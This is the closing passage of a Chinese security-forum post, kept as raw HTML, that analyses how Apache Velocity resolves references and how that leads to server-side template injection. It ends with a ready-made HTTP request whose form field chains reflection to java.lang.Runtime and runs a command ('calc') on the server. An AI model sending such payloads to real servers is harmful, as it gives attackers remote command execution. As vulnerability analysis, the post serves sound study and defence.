<span class=k>return</span> <span class=n>EventHandlerUtil</span><span class=p>.</span><span class=n>invalidGetMethod</span><span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>rsvc</span><span class=p>,</span> <span class=n>context</span><span class=p>,</span> <span class=n>this</span><span class=p>.</span><span class=n>getDollarBang</span><span class=p>()</span> <span class=o>+</span> <span class=n>this</span><span class=p>.</span><span class=n>rootString</span><span class=p>,</span> <span class=p>(</span><span class=n>Object</span><span class=p>)</span><span class=n>null</span><span class=p>,</span> <span class=p>(</span><span class=n>String</span><span class=p>)</span><span class=n>null</span><span class=p>,</span> <span class=n>this</span><span class=p>.</span><span class=n>uberInfo</span><span class=p>);</span>
<span class=p>}</span> <span class=k>else</span> <span class=p>{</span>
<span class=n>try</span> <span class=p>{</span>
<span class=n>Object</span> <span class=n>previousResult</span> <span class=o>=</span> <span class=n>result</span><span class=p>;</span>
<span class=kt>int</span> <span class=n>failedChild</span> <span class=o>=</span> <span class=o>-</span><span class=mi>1</span><span class=p>;</span>
<span class=n>String</span> <span class=n>methodName</span><span class=p>;</span>
<span class=k>for</span><span class=p>(</span><span class=kt>int</span> <span class=n>i</span> <span class=o>=</span> <span class=mi>0</span><span class=p>;</span> <span class=n>i</span> <span class=o><</span> <span class=n>this</span><span class=p>.</span><span class=n>numChildren</span><span class=p>;</span> <span class=o>++</span><span class=n>i</span><span class=p>)</span> <span class=p>{</span>
<span class=k>if</span> <span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>strictRef</span> <span class=o>&&</span> <span class=n>result</span> <span class=o>==</span> <span class=n>null</span><span class=p>)</span> <span class=p>{</span>
<span class=n>methodName</span> <span class=o>=</span> <span class=n>this</span><span class=p>.</span><span class=n>jjtGetChild</span><span class=p>(</span><span class=n>i</span><span class=p>).</span><span class=n>getFirstToken</span><span class=p>().</span><span class=n>image</span><span class=p>;</span>
<span class=n>throw</span> <span class=n>new</span> <span class=n>VelocityException</span><span class=p>(</span><span class=s>"Attempted to access '"</span> <span class=o>+</span> <span class=n>methodName</span> <span class=o>+</span> <span class=s>"' on a null value at "</span> <span class=o>+</span> <span class=n>Log</span><span class=p>.</span><span class=n>formatFileString</span><span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>uberInfo</span><span class=p>.</span><span class=n>getTemplateName</span><span class=p>(),</span> <span class=n>this</span><span class=p>.</span><span class=n>jjtGetChild</span><span class=p>(</span><span class=n>i</span><span class=p>).</span><span class=n>getLine</span><span class=p>(),</span> <span class=n>this</span><span class=p>.</span><span class=n>jjtGetChild</span><span class=p>(</span><span class=n>i</span><span class=p>).</span><span class=n>getColumn</span><span class=p>()));</span>
<span class=p>}</span>
<span class=n>previousResult</span> <span class=o>=</span> <span class=n>result</span><span class=p>;</span>
<span class=n>result</span> <span class=o>=</span> <span class=n>this</span><span class=p>.</span><span class=n>jjtGetChild</span><span class=p>(</span><span class=n>i</span><span class=p>).</span><span class=n>execute</span><span class=p>(</span><span class=n>result</span><span class=p>,</span> <span class=n>context</span><span class=p>);</span>
<span class=k>if</span> <span class=p>(</span><span class=n>result</span> <span class=o>==</span> <span class=n>null</span> <span class=o>&&</span> <span class=o>!</span><span class=n>this</span><span class=p>.</span><span class=n>strictRef</span><span class=p>)</span> <span class=p>{</span>
<span class=n>failedChild</span> <span class=o>=</span> <span class=n>i</span><span class=p>;</span>
<span class=k>break</span><span class=p>;</span>
<span class=p>}</span>
<span class=p>}</span>
<span class=k>if</span> <span class=p>(</span><span class=n>result</span> <span class=o>==</span> <span class=n>null</span><span class=p>)</span> <span class=p>{</span>
<span class=k>if</span> <span class=p>(</span><span class=n>failedChild</span> <span class=o>==</span> <span class=o>-</span><span class=mi>1</span><span class=p>)</span> <span class=p>{</span>
<span class=n>result</span> <span class=o>=</span> <span class=n>EventHandlerUtil</span><span class=p>.</span><span class=n>invalidGetMethod</span><span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>rsvc</span><span class=p>,</span> <span class=n>context</span><span class=p>,</span> <span class=n>this</span><span class=p>.</span><span class=n>getDollarBang</span><span class=p>()</span> <span class=o>+</span> <span class=n>this</span><span class=p>.</span><span class=n>rootString</span><span class=p>,</span> <span class=n>previousResult</span><span class=p>,</span> <span class=p>(</span><span class=n>String</span><span class=p>)</span><span class=n>null</span><span class=p>,</span> <span class=n>this</span><span class=p>.</span><span class=n>uberInfo</span><span class=p>);</span>
<span class=p>}</span> <span class=k>else</span> <span class=p>{</span>
<span class=n>StringBuffer</span> <span class=n>name</span> <span class=o>=</span> <span class=p>(</span><span class=n>new</span> <span class=n>StringBuffer</span><span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>getDollarBang</span><span class=p>())).</span><span class=n>append</span><span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>rootString</span><span class=p>);</span>
<span class=k>for</span><span class=p>(</span><span class=kt>int</span> <span class=n>i</span> <span class=o>=</span> <span class=mi>0</span><span class=p>;</span> <span class=n>i</span> <span class=o><=</span> <span class=n>failedChild</span><span class=p>;</span> <span class=o>++</span><span class=n>i</span><span class=p>)</span> <span class=p>{</span>
<span class=n>Node</span> <span class=n>node</span> <span class=o>=</span> <span class=n>this</span><span class=p>.</span><span class=n>jjtGetChild</span><span class=p>(</span><span class=n>i</span><span class=p>);</span>
<span class=k>if</span> <span class=p>(</span><span class=n>node</span> <span class=n>instanceof</span> <span class=n>ASTMethod</span><span class=p>)</span> <span class=p>{</span>
<span class=n>name</span><span class=p>.</span><span class=n>append</span><span class=p>(</span><span class=s>"."</span><span class=p>).</span><span class=n>append</span><span class=p>(((</span><span class=n>ASTMethod</span><span class=p>)</span><span class=n>node</span><span class=p>).</span><span class=n>getMethodName</span><span class=p>()).</span><span class=n>append</span><span class=p>(</span><span class=s>"()"</span><span class=p>);</span>
<span class=p>}</span> <span class=k>else</span> <span class=p>{</span>
<span class=n>name</span><span class=p>.</span><span class=n>append</span><span class=p>(</span><span class=s>"."</span><span class=p>).</span><span class=n>append</span><span class=p>(</span><span class=n>node</span><span class=p>.</span><span class=n>getFirstToken</span><span class=p>().</span><span class=n>image</span><span class=p>);</span>
<span class=p>}</span>
<span class=p>}</span>
<span class=k>if</span> <span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>jjtGetChild</span><span class=p>(</span><span class=n>failedChild</span><span class=p>)</span> <span class=n>instanceof</span> <span class=n>ASTMethod</span><span class=p>)</span> <span class=p>{</span>
<span class=n>methodName</span> <span class=o>=</span> <span class=p>((</span><span class=n>ASTMethod</span><span class=p>)</span><span class=n>this</span><span class=p>.</span><span class=n>jjtGetChild</span><span class=p>(</span><span class=n>failedChild</span><span class=p>)).</span><span class=n>getMethodName</span><span class=p>();</span>
<span class=n>result</span> <span class=o>=</span> <span class=n>EventHandlerUtil</span><span class=p>.</span><span class=n>invalidMethod</span><span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>rsvc</span><span class=p>,</span> <span class=n>context</span><span class=p>,</span> <span class=n>name</span><span class=p>.</span><span class=n>toString</span><span class=p>(),</span> <span class=n>previousResult</span><span class=p>,</span> <span class=n>methodName</span><span class=p>,</span> <span class=n>this</span><span class=p>.</span><span class=n>uberInfo</span><span class=p>);</span>
<span class=p>}</span> <span class=k>else</span> <span class=p>{</span>
<span class=n>methodName</span> <span class=o>=</span> <span class=n>this</span><span class=p>.</span><span class=n>jjtGetChild</span><span class=p>(</span><span class=n>failedChild</span><span class=p>).</span><span class=n>getFirstToken</span><span class=p>().</span><span class=n>image</span><span class=p>;</span>
<span class=n>result</span> <span class=o>=</span> <span class=n>EventHandlerUtil</span><span class=p>.</span><span class=n>invalidGetMethod</span><span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>rsvc</span><span class=p>,</span> <span class=n>context</span><span class=p>,</span> <span class=n>name</span><span class=p>.</span><span class=n>toString</span><span class=p>(),</span> <span class=n>previousResult</span><span class=p>,</span> <span class=n>methodName</span><span class=p>,</span> <span class=n>this</span><span class=p>.</span><span class=n>uberInfo</span><span class=p>);</span>
<span class=p>}</span>
<span class=p>}</span>
<span class=p>}</span>
<span class=k>return</span> <span class=n>result</span><span class=p>;</span>
<span class=p>}</span> <span class=n>catch</span> <span class=p>(</span><span class=n>MethodInvocationException</span> <span class=n>var9</span><span class=p>)</span> <span class=p>{</span>
<span class=n>var9</span><span class=p>.</span><span class=n>setReferenceName</span><span class=p>(</span><span class=n>this</span><span class=p>.</span><span class=n>rootString</span><span class=p>);</span>
<span class=n>throw</span> <span class=n>var9</span><span class=p>;</span>
<span class=p>}</span>
<span class=p>}</span>
<span class=p>}</span>
<span class=p>}</span>
</pre></div>
<p>通过反射获取执行的类</p>
<p><a id=img24 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821102314-51e1ec12-5f64-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821102314-51e1ec12-5f64-1.png></a></p>
<p>最后完成解析执行:</p>
<p><a id=img25 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821102327-594cb6bc-5f64-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821102327-594cb6bc-5f64-1.png></a></p>
<p>补充一个可用载荷:</p>
<div class=highlight><pre><span></span><span class=n>POST</span> <span class=o>/</span><span class=n>ssti</span><span class=o>/</span><span class=n>velocity1</span> <span class=n>HTTP</span><span class=o>/</span><span class=mf>1.1</span>
<span class=nl>Host</span><span class=p>:</span> <span class=mf>192.168.1.7</span><span class=o>:</span><span class=mi>8080</span>
<span class=n>Upgrade</span><span class=o>-</span><span class=n>Insecure</span><span class=o>-</span><span class=nl>Requests</span><span class=p>:</span> <span class=mi>1</span>
<span class=n>User</span><span class=o>-</span><span class=nl>Agent</span><span class=p>:</span> <span class=n>Mozilla</span><span class=o>/</span><span class=mf>5.0</span> <span class=p>(</span><span class=n>Windows</span> <span class=n>NT</span> <span class=mf>10.0</span><span class=p>;</span> <span class=n>Win64</span><span class=p>;</span> <span class=n>x64</span><span class=p>)</span> <span class=n>AppleWebKit</span><span class=o>/</span><span class=mf>537.36</span> <span class=p>(</span><span class=n>KHTML</span><span class=p>,</span> <span class=n>like</span> <span class=n>Gecko</span><span class=p>)</span> <span class=n>Chrome</span><span class=o>/</span><span class=mf>127.0.0.0</span> <span class=n>Safari</span><span class=o>/</span><span class=mf>537.36</span>
<span class=nl>Accept</span><span class=p>:</span> <span class=n>text</span><span class=o>/</span><span class=n>html</span><span class=p>,</span><span class=n>application</span><span class=o>/</span><span class=n>xhtml</span><span class=o>+</span><span class=n>xml</span><span class=p>,</span><span class=n>application</span><span class=o>/</span><span class=n>xml</span><span class=p>;</span><span class=n>q</span><span class=o>=</span><span class=mf>0.9</span><span class=p>,</span><span class=n>image</span><span class=o>/</span><span class=n>avif</span><span class=p>,</span><span class=n>image</span><span class=o>/</span><span class=n>webp</span><span class=p>,</span><span class=n>image</span><span class=o>/</span><span class=n>apng</span><span class=p>,</span><span class=err>*/</span><span class=o>*</span><span class=p>;</span><span class=n>q</span><span class=o>=</span><span class=mf>0.8</span><span class=p>,</span><span class=n>application</span><span class=o>/</span><span class=kt>signed</span><span class=o>-</span><span class=n>exchange</span><span class=p>;</span><span class=n>v</span><span class=o>=</span><span class=n>b3</span><span class=p>;</span><span class=n>q</span><span class=o>=</span><span class=mf>0.7</span>
<span class=n>Accept</span><span class=o>-</span><span class=nl>Encoding</span><span class=p>:</span> <span class=n>gzip</span><span class=p>,</span> <span class=n>deflate</span>
<span class=n>Accept</span><span class=o>-</span><span class=nl>Language</span><span class=p>:</span> <span class=n>zh</span><span class=o>-</span><span class=n>CN</span><span class=p>,</span><span class=n>zh</span><span class=p>;</span><span class=n>q</span><span class=o>=</span><span class=mf>0.9</span>
<span class=nl>Connection</span><span class=p>:</span> <span class=n>close</span>
<span class=n>Content</span><span class=o>-</span><span class=nl>Type</span><span class=p>:</span> <span class=n>application</span><span class=o>/</span><span class=n>x</span><span class=o>-</span><span class=n>www</span><span class=o>-</span><span class=n>form</span><span class=o>-</span><span class=n>urlencoded</span>
<span class=n>Content</span><span class=o>-</span><span class=nl>Length</span><span class=p>:</span> <span class=mi>303</span>
<span class=n>username</span><span class=o>=</span><span class=err>#</span><span class=n>set</span><span class=p>(</span><span class=err>$</span><span class=n>s</span><span class=o>=</span><span class=s>""</span><span class=p>)</span>
<span class=cp>#set($stringClass=$s.getClass())</span>
<span class=cp>#set($runtime=$stringClass.forName("java.lang.Runtime").getRuntime())</span>
<span class=cp>#set($process=$runtime.exec("cmd.exe /c calc"))</span>
<span class=cp>#set($out=$process.getInputStream())</span>
<span class=cp>#set($null=$process.waitFor() )</span>
<span class=cp>#foreach($i+in+[1..$out.available()])</span>
<span class=err>$</span><span class=n>out</span><span class=p>.</span><span class=n>read</span><span class=p>()</span>
<span class=cp>#end</span>
</pre></div>
<p><a id=img26 href=https://xzfile.aliyuncs.com/media/upload/picture/20240821102433-80eea478-5f64-1.png><img src=data:, data-sf-original-src=https://xzfile.aliyuncs.com/media/upload/picture/20240821102433-80eea478-5f64-1.png></a></p>
<h3 id=toc-5>参考连接</h3>
<p><a href=https://velocity.apache.org/engine/1.7/user-guide.html target=_blank>https://velocity.apache.org/engine/1.7/user-guide.html</a></p>
</div>
<div class=post-user-action style=margin-top:34px>
<span class="btn btn-default pull-right" id=mark data-action=topic data-pk=15358>
<span id=mark-text>点击收藏 </span><span class=i-seprator> | </span><span id=mark-count>0</span>
</span>
<span class="btn btn-default pull-right" id=follow_topic data-pk=15358>
<span>关注</span><span class=i-seprator> | </span><span id=follow-count>1</span>
</span>
<span class="btn btn-default pull-right">
<span>
<span id=ready_reward data-toggle=modal data-target=#myModal>打赏</span>
</span>
</span>
<div class=clearfix></div>
</div>
<div class=related-section>
<div class=related-box>
<span><a class=pull-left href=https://xz.aliyun.com/t/15357 title="CrewCTF2024 WP(Partial)"><span class=related-label style="padding:3px 4px;margin-right:3px">上一篇:</span>CrewCTF2024 WP(Pa...</a></span>
<span><a class=pull-left href=https://xz.aliyun.com/t/15402 title="某微 e-cology 远程代码执行漏洞分析(XVE-2024-20913)"><span class=related-label>下一篇:</span>某微 e-cology 远程代码执...</a></span>
</div>
</div>
</div>
</div>
</div>
<div class="modal fade" id=myModal role=dialog aria-labelledby=myModalLabel aria-hidden=true>
<div class=modal-dialog>
<div class=modal-content>
<div class=modal-header>
<h4 class=modal-title id=myModalLabel style=text-align:center>
积分打赏
</h4>
</div>
<div class=modal-body id=button-value>
<div style=text-align:center>
<div role=group>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type1>
1分
</button>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type2>
2分
</button>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type3>
5分
</button>
</div>
<br>
<div style=margin-top:20px>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type4>
8分
</button>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type5>
10分
</button>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type6>
20分
</button>
</div>
</div>
</div>
<div class=modal-footer id=confirm>
<button type=button class="btn btn-default" data-dismiss=modal>关闭</button>
<button type=button class="btn btn-primary" id=reward_topic data-pk=15358>确定</button>
</div>
</div>
</div>
</div>
<div class="row box">
<ol class=breadcrumb>
<li class=active>0 条回复</li>
</ol>
<div class="box-container post-container">
<ul>
<li style=min-height:50px;line-height:60px;margin-left:15px><strong>动动手指,沙发就是你的了!</strong></li>
</ul>
</div>
</div>
<div class="row box" id=reply-box>
<div class="box-container clearfix">
<div class=reminder>
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F15358&from_type=xianzhi"><strong>登录</strong></a> 后跟帖
</div>
</div>
</div>
</div>
</div>
</div>
<footer class=bs-docs-footer>
<div class="container text-center">
<div class=links>
<a href=https://xz.aliyun.com/feed target=_blank>RSS</a>
<a href=https://xz.aliyun.com/about target=_blank><span>关于社区</span></a>
<a href=https://xz.aliyun.com/partner target=_blank><span>友情链接</span></a>
<a href=https://xz.aliyun.com/notice>社区小黑板</a>
<a href=https://xz.aliyun.com/connection>联系我们</a>
<a href=https://report.aliyun.com/ target=_blank>举报中心</a>
<a href=https://www.aliyun.com/complaint target=_blank>我要投诉</a>
</div>
</div>
</footer>
<div id=waf_nc_block style=display:none></div><div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
* Pico.css v1.5.6 (https://picocss.com)